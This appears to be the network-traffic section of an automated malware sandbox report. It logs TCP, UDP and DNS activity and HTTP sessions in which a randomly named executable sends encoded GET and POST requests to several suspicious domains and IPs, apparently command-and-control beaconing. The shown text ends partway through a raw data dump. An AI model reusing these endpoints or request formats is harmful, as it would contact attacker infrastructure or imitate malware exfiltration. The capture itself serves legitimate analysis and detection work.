Nov 24, 2024 08:14:36.723464012 CET	49990	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:36.843020916 CET	80	49990	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:36.843162060 CET	49990	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:36.852869034 CET	49990	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:36.972413063 CET	80	49990	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:38.188205957 CET	80	49990	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:38.188271046 CET	80	49990	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:38.188508034 CET	49990	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:38.191446066 CET	49990	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:38.310792923 CET	80	49990	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:43.883008003 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:44.002588034 CET	80	49991	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:44.002674103 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:44.018094063 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:44.137654066 CET	80	49991	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:45.532572031 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:45.606446981 CET	80	49991	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:45.606774092 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:45.607377052 CET	80	49991	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:45.607435942 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:45.653824091 CET	80	49991	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:45.653947115 CET	49991	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:46.551604986 CET	49992	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:46.671178102 CET	80	49992	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:46.671272039 CET	49992	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:46.687326908 CET	49992	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:46.806967974 CET	80	49992	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:47.949179888 CET	80	49992	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:47.949549913 CET	80	49992	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:47.949609995 CET	49992	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:48.188869953 CET	49992	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:49.209075928 CET	49993	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:49.328721046 CET	80	49993	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:49.328805923 CET	49993	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:49.344791889 CET	49993	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:49.465385914 CET	80	49993	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:49.465661049 CET	80	49993	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:50.600850105 CET	80	49993	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:50.602277040 CET	80	49993	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:50.602328062 CET	49993	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:50.860692978 CET	49993	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:51.879738092 CET	49994	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:51.999305010 CET	80	49994	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:51.999526978 CET	49994	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:52.015127897 CET	49994	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:52.134583950 CET	80	49994	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:53.272583961 CET	80	49994	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:53.273127079 CET	80	49994	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:53.273536921 CET	49994	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:53.275861025 CET	49994	80	192.168.2.9	172.67.145.234
Nov 24, 2024 08:14:53.395442009 CET	80	49994	172.67.145.234	192.168.2.9
Nov 24, 2024 08:14:58.700084925 CET	49995	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:14:58.819612980 CET	80	49995	172.67.167.146	192.168.2.9
Nov 24, 2024 08:14:58.819741964 CET	49995	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:14:58.839129925 CET	49995	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:14:58.958873034 CET	80	49995	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:00.279894114 CET	80	49995	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:00.280905008 CET	80	49995	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:00.280976057 CET	49995	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:00.345240116 CET	49995	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:01.364162922 CET	49996	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:01.483867884 CET	80	49996	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:01.484005928 CET	49996	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:01.499948978 CET	49996	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:01.619636059 CET	80	49996	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:02.944839954 CET	80	49996	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:02.945843935 CET	80	49996	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:02.945877075 CET	80	49996	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:02.945909977 CET	49996	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:02.945986986 CET	49996	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:03.001456022 CET	49996	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:04.020622969 CET	49997	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:04.140381098 CET	80	49997	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:04.140531063 CET	49997	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:04.156848907 CET	49997	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:04.276498079 CET	80	49997	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:04.276544094 CET	80	49997	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:05.598087072 CET	80	49997	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:05.598788977 CET	80	49997	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:05.598869085 CET	49997	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:05.673258066 CET	49997	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:06.692497969 CET	49998	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:06.812184095 CET	80	49998	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:06.812366962 CET	49998	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:06.822534084 CET	49998	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:06.942158937 CET	80	49998	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:08.315754890 CET	80	49998	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:08.315963030 CET	80	49998	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:08.316037893 CET	49998	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:08.319727898 CET	49998	80	192.168.2.9	172.67.167.146
Nov 24, 2024 08:15:08.440362930 CET	80	49998	172.67.167.146	192.168.2.9
Nov 24, 2024 08:15:13.888488054 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:14.008428097 CET	80	49999	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:14.008604050 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:14.023761034 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:14.143332958 CET	80	49999	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:15.532546997 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:15.568288088 CET	80	49999	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:15.568409920 CET	80	49999	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:15.568443060 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:15.568528891 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:15.652158976 CET	80	49999	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:15.652333021 CET	49999	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:16.551199913 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:16.670695066 CET	80	50000	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:16.670808077 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:16.686587095 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:16.806245089 CET	80	50000	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:18.188878059 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:18.193378925 CET	80	50000	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:18.193469048 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:18.193573952 CET	80	50000	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:18.193619013 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:18.308435917 CET	80	50000	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:18.308511972 CET	50000	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:19.207947016 CET	50001	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:19.327668905 CET	80	50001	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:19.327816010 CET	50001	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:19.355782986 CET	50001	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:19.475394011 CET	80	50001	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:19.475423098 CET	80	50001	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:20.860836983 CET	50001	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:20.980920076 CET	80	50001	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:20.981066942 CET	50001	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:21.879522085 CET	50002	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:21.999100924 CET	80	50002	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:21.999238968 CET	50002	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:22.009342909 CET	50002	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:22.130098104 CET	80	50002	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:23.516329050 CET	80	50002	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:23.516442060 CET	80	50002	154.88.22.110	192.168.2.9
Nov 24, 2024 08:15:23.516536951 CET	50002	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:23.519629002 CET	50002	80	192.168.2.9	154.88.22.110
Nov 24, 2024 08:15:23.639075041 CET	80	50002	154.88.22.110	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 08:13:03.278503895 CET	58980	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:13:03.884412050 CET	53	58980	1.1.1.1	192.168.2.9
Nov 24, 2024 08:13:20.411982059 CET	49605	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:13:21.408365011 CET	49605	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:13:21.585680962 CET	53	49605	1.1.1.1	192.168.2.9
Nov 24, 2024 08:13:21.585761070 CET	53	49605	1.1.1.1	192.168.2.9
Nov 24, 2024 08:13:36.271307945 CET	62931	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:13:37.267025948 CET	62931	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:13:37.313338995 CET	53	62931	1.1.1.1	192.168.2.9
Nov 24, 2024 08:13:37.404433966 CET	53	62931	1.1.1.1	192.168.2.9
Nov 24, 2024 08:14:12.412153959 CET	57922	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:14:13.407731056 CET	57922	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:14:13.574248075 CET	53	57922	1.1.1.1	192.168.2.9
Nov 24, 2024 08:14:13.574270010 CET	53	57922	1.1.1.1	192.168.2.9
Nov 24, 2024 08:14:28.146013975 CET	59162	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:14:28.733688116 CET	53	59162	1.1.1.1	192.168.2.9
Nov 24, 2024 08:14:43.210772038 CET	52292	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:14:43.880153894 CET	53	52292	1.1.1.1	192.168.2.9
Nov 24, 2024 08:14:58.286355019 CET	54685	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:14:58.697288990 CET	53	54685	1.1.1.1	192.168.2.9
Nov 24, 2024 08:15:13.333672047 CET	53482	53	192.168.2.9	1.1.1.1
Nov 24, 2024 08:15:13.885879040 CET	53	53482	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2024 08:13:03.278503895 CET	192.168.2.9	1.1.1.1	0x1ee6	Standard query (0)	www.nb-shenshi.buzz	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:20.411982059 CET	192.168.2.9	1.1.1.1	0x4d33	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.408365011 CET	192.168.2.9	1.1.1.1	0x4d33	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:36.271307945 CET	192.168.2.9	1.1.1.1	0x5a3a	Standard query (0)	www.xcvbj.asia	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:37.267025948 CET	192.168.2.9	1.1.1.1	0x5a3a	Standard query (0)	www.xcvbj.asia	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:12.412153959 CET	192.168.2.9	1.1.1.1	0x32e2	Standard query (0)	www.soainsaat.xyz	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:13.407731056 CET	192.168.2.9	1.1.1.1	0x32e2	Standard query (0)	www.soainsaat.xyz	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:28.146013975 CET	192.168.2.9	1.1.1.1	0xd80e	Standard query (0)	www.amayavp.xyz	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:43.210772038 CET	192.168.2.9	1.1.1.1	0x920f	Standard query (0)	www.vayui.top	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:58.286355019 CET	192.168.2.9	1.1.1.1	0xaea7	Standard query (0)	www.rgenerousrs.store	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:15:13.333672047 CET	192.168.2.9	1.1.1.1	0x357a	Standard query (0)	www.t91rl7.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2024 08:12:19.453407049 CET	1.1.1.1	192.168.2.9	0xe26a	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:12:19.453407049 CET	1.1.1.1	192.168.2.9	0xe26a	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:03.884412050 CET	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	www.nb-shenshi.buzz		161.97.168.245	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585680962 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585680962 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585680962 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585680962 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585761070 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585761070 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585761070 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:21.585761070 CET	1.1.1.1	192.168.2.9	0x4d33	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:37.313338995 CET	1.1.1.1	192.168.2.9	0x5a3a	No error (0)	www.xcvbj.asia		149.88.81.190	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:13:37.404433966 CET	1.1.1.1	192.168.2.9	0x5a3a	No error (0)	www.xcvbj.asia		149.88.81.190	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:13.574248075 CET	1.1.1.1	192.168.2.9	0x32e2	No error (0)	www.soainsaat.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:14:13.574248075 CET	1.1.1.1	192.168.2.9	0x32e2	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:14:13.574248075 CET	1.1.1.1	192.168.2.9	0x32e2	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:13.574270010 CET	1.1.1.1	192.168.2.9	0x32e2	No error (0)	www.soainsaat.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:14:13.574270010 CET	1.1.1.1	192.168.2.9	0x32e2	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:14:13.574270010 CET	1.1.1.1	192.168.2.9	0x32e2	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:28.733688116 CET	1.1.1.1	192.168.2.9	0xd80e	No error (0)	www.amayavp.xyz		185.27.134.144	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:43.880153894 CET	1.1.1.1	192.168.2.9	0x920f	No error (0)	www.vayui.top		172.67.145.234	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:43.880153894 CET	1.1.1.1	192.168.2.9	0x920f	No error (0)	www.vayui.top		104.21.95.160	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:58.697288990 CET	1.1.1.1	192.168.2.9	0xaea7	No error (0)	www.rgenerousrs.store		172.67.167.146	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:14:58.697288990 CET	1.1.1.1	192.168.2.9	0xaea7	No error (0)	www.rgenerousrs.store		104.21.57.248	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:15:13.885879040 CET	1.1.1.1	192.168.2.9	0x357a	No error (0)	www.t91rl7.pro		154.88.22.110	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.nb-shenshi.buzz

www.laohub10.net

www.xcvbj.asia

www.soainsaat.xyz

www.amayavp.xyz

www.vayui.top

www.rgenerousrs.store

www.t91rl7.pro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49803	161.97.168.245	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:04.023580074 CET	481	OUT	GET /xxr1/?6vSXrZxp=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM6q1x7MLoHRo8pv4eG/wGdJUiKAzPmFA==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.nb-shenshi.buzz Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:13:05.360497952 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:13:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 24, 2024 08:13:05.360518932 CET	1236	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 24, 2024 08:13:05.360529900 CET	698	IN	Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49845	27.124.4.246	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:21.728193998 CET	744	OUT	POST /sgdd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/sgdd/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 66 35 37 46 62 46 45 66 38 74 77 54 55 53 32 38 76 69 32 69 35 52 7a 32 74 61 6d 2f Data Ascii: 6vSXrZxp=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLf57FbFEf8twTUS28vi2i5Rz2tam/
Nov 24, 2024 08:13:23.145857096 CET	525	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 350 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 